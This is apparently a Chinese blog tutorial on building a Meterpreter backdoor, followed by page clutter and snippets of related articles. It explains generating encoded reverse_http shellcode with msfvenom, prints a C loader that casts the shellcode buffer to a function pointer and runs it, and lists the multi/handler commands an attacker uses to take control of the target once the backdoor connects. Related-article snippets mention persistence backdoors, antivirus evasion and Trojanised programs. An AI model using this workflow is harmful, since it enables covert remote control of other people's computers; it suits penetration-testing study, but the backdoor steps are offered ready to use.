Metasploit应用笔记-msfvenom生成meterpreter后门代码

最新推荐文章于 2024-02-27 09:30:28 发布
最新推荐文章于 2024-02-27 09:30:28 发布
阅读量1.8w 收藏 2
点赞数 1
分类专栏: 安全技术
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/onevs1/article/details/8623088
版权

1 用msfvenom生成c语言格式的shellcode.


windows/meterpreter/reverse_http是shellcode, X86/shikata_ga_nai是指定对shellcode的编码方法,-i 3 是指定编码次数,LHOST LPORT是shellcode要使用的参数,表示shellcode运行是连接的IP地址和端口。-f c 指定shellcode的c语言格式。也可以使用-f exe 直接输出可执行的exe文件。


2 在C程序中调用Shellcode:

unsigned char buf[] = 
"\xd9\xf6\xbe\xb2\x7c\x9f\x62\xd9\x74\x24\xf4\x5f\x29\xc9\xb1";
int _tmain(int argc, _TCHAR* argv[])
{
	void (*fun)();
	*(int*)&fun = (int)buf;
	printf("Execute meterpreter shellcode.....\n");
	fun();
	return 0;
}


3 在attacker电脑上启动metasploit 控制台:msfcosole. 如图:


解释一下命令

msf > use exploit/multi/handler               使用exploit/multi/handler监听连入的backdoor
msf  exploit(handler) > set payload windows/meterpreter/reverse_http            设置对应的payload。payload就是shellcode的意思。
msf  exploit(handler) > show options                         显示所有的设置

如果需要的话,可能还需要将LHOST,LPORT,设置成与shellcode中相同的地址和端口。

4 最后在attacker电脑上运行exploit命令,一旦有backdoor连进来,就可以用命令来控制目标了。


oneVs1
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
clr-meterpreterMeterpreter的CLR实现的完整故事
02-05
该存储库包含围绕打算在CLR上运行的Meterpreter的新实现的开发而产生的所有杂音和工件。 整个项目都在上进行直播,并在和存档。 有关此项目的基本原理,请参阅我的,并查看下面的第1部分。 这将花费很长时间,并且目前看不到太多东西! 从(完成时)到PR的存储库 完成后,这只是我自己的会计。 我需要记住我在修改过程中所做的事情。 metasploit-framework metasploit-payloads rex-arch 热衷于参与? 在我的页面的“建议”框中提交问题和评论(并在我最终成为会员时进行订阅)。 如果您有需要,可以随时在此回购中提交问题,但我希望使用建议框。
metasploitframework-win-x64
10-05
Metasploit Framework 作为一个缓冲区溢出测试使用的辅助工具,也可以说是一个漏洞利用和测试平台。它集成了各平台上常见的溢出漏洞和流行的shellcode,并且不断更新,使得缓冲区溢出测试变得方便和简单。 使用Metasploit安全测试工具在渗透测试中可以做很多事情,你可以保存你的日志、甚至定义每个有效负载在运行完成之后是如何将其自身清除的。值得一提的是这个强大的工具是免费的,它的开发团队由两个全职成员和少数兼职的投稿者组成,Metasploit Framework由最初的1.0版发展到现在的3.0版的漏洞自动化探测,成绩骄人,精神可嘉!
Metasploit安装及使用教程(非常详细)从零基础入门到精通,看完这一篇就够了。
最新发布
资深程序员,曾自学JAVA,C#,如今从业于网安行业
02-27 1015
通过本篇文章,我们将会学习以下内容:1、在Windows上安装Metasploit2、在Linux和MacOS上安装Metasploit3、在Kali Linux中使用 Metasploit4、升级Kali Linux5、使用虚拟化软件构建渗透测试实验环境6、配置SSH连接7、使用SSH连接Kali8、配置PostgreSQL数据库9、创建工作区10、使用数据库11、使用hosts命令12、理解services命令。
C语言写的shellcode
03-05
C语言写的开端口的shellcode 打开9878端口的ShellCode源代码
metasploit-framework-6.3.34.zip
09-17
metasploit-framework-6.3.34.zip
metasploit-4.17.1-2020080301-windows-x64-installer.exe
01-10
metasploit
msf win10系统攻击
WEB渗透测试 从入门到萌新
10-02 4424
win10系统攻击msf
Msfvenom的使用
Beret-81的博客
03-12 972
目录1、初识 Msfvenom2、Msfvenom 使用3、Msfvenom 例子Msfvenom 生成 elf 文件4、Msfvenom 生成各种 Payload 1、初识 Msfvenom MsfvenomMetasploit独立的有效载荷生成器,也可以替代msfpayload和msfencode。 2、Msfvenom 使用 语法: Msfvenom -p lhost= lpor...
msfvenom制作简易后门程序
wing_7的博客
10-05 565
设置错误端口8888监听不到,修改端口 4444 ,kali显示 session 连接接成功获取shell成功。使用exploit/mulit/handler模块并进行设置。基于Linux的Shellcode。ubuntu中获取cve 执行。
c语言msf,Metasploit应用笔记-msfvenom生成meterpreter后门代码
weixin_34564735的博客
05-21 698
1 用msfvenom生成c语言格式的shellcode. windows/meterpreter/reverse_http是shellcode, X86/shikata_ga_nai是指定对shellcode的编码方法,-i 3 是指定编码次数,LHOST LPORT是shellcode要使用的参数,表示shellcode运行是连接的IP地址和端口。-f c 指定shellcode的c语言格式。...
MSF之Persistence后门
weixin_46104215的博客
09-27 2379
Persistence:一款使用安装自动方式的持久性后门程序,可以利用它创建注册和文件 一、实验环境 攻击主机:2021 Kali (ip:192.168.110.130) 靶机:win7(专业版) (ip:192.168.110.134) 准备:先通过攻击获取一个 meterpreter shell(之前的文章中有介绍的 ms17-010漏洞) 二、实验步骤 1.获得 meterpreter shell 之后,输入 run persistence -A -S -U...
metasploit-framework-master.zip
09-08
metasploit-framework-master
Metasploit (MSF) 使用:包含基本使用、payload生成、后渗透模块使用
Alone hackers的博客
03-06 4227
Metasploit (MSF) 使用:包含基本使用,payload生成,后渗透模块使用。
kali linux渗透攻击基于漏洞工具Metasploit
xiaoma920的博客
05-25 648
该文章只提供学习,禁止做违法的事情,任何后果与作者无关2.第二百八十五条第二款 违反国家规定,侵入前款规定以外的计算机信息系统或者采用其他技术手段,获取该计算机信息系统中存储、处理或者传输的数据,或者对该计算机信息系统实施非法控制,情节严重的,处三年以下有期徒刑或者拘役,并处或者单处罚金;情节特别严重的,处三年以上七年以下有期徒刑,并处罚金。
Metasploit渗透测试框架基础
hanjinming110的博客
03-02 1969
MSF渗透测试框架基础
Metasploit 渗透测试三 | 制作木马并获取节点shell
LALAAYANG的博客
10-30 351
Metasploit 渗透测试三 | 制作木马并获取节点shell问题概述执行过程 问题概述 下载putty程序(也可以使用其它程序),利用msfvenom制作绑定攻击代码的木马程序,并在目标节点运行该程序,获得目标节点的shell。 执行过程 首先msfvenom制作木马,附加在putty_mydown0501.exe上的chenyang.exe:(注意不同位置参数的意义) 将木马上传到服务器,便于在目标机直接下载: 设置参数,开始监听: 目标机运行木马打通meterpreter,执行shell获取
远控免杀专题文章(2)-msfvenom隐藏的参数
mingyqf的博客
12-05 719
脉搏文库 TideSec 本专题文章导航 1、远控免杀专题文章(1)-基础篇:https://www.secpulse.com/archives/123295.html 因为cobaltstrike生成payload比较简单,这里不再累述,只是介绍一下msfvenom的基本参数和一些小技巧。 本节目录如下: msfvenom简介 msfvenom是msfpayload和msfencode的结合体,于2015年6月8日取代了msfpayload和msfencode。在此之后,metasploit-fram
MSF后渗透持续后门
分享学习网络的点点滴滴
01-11 699
○ 利用漏洞取得的meterpreter shell运行于内存中,重启失效○ 重复exploit漏洞可能造成服务崩溃○ 持久后门保证漏洞修复后仍可远程控制。
使用MSF生成的shellcode打造免杀payload
热门推荐
MickeyMouse1928的博客
05-04 1万+
环境: 1.Kali攻击机IP:192.168.114.140 2.使用win7生成exe 步骤: 使用msfvenom生成shellcode : msfvenom -pwindows/meterpreter/reverse_http lhost=192.168.114.140 lport=5555 -f c win7中使用Visual studio创建Win32控制台
msfvenom生成安卓后门
09-10
msfvenomMetasploit框架的一个工具,用于生成恶意软件,包括后门。在使用msfvenom生成安卓后门时,我们需要首先了解一些基本概念和步骤。 首先,我们需要安装和设置Metasploit框架。然后,我们可以使用msfvenom...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值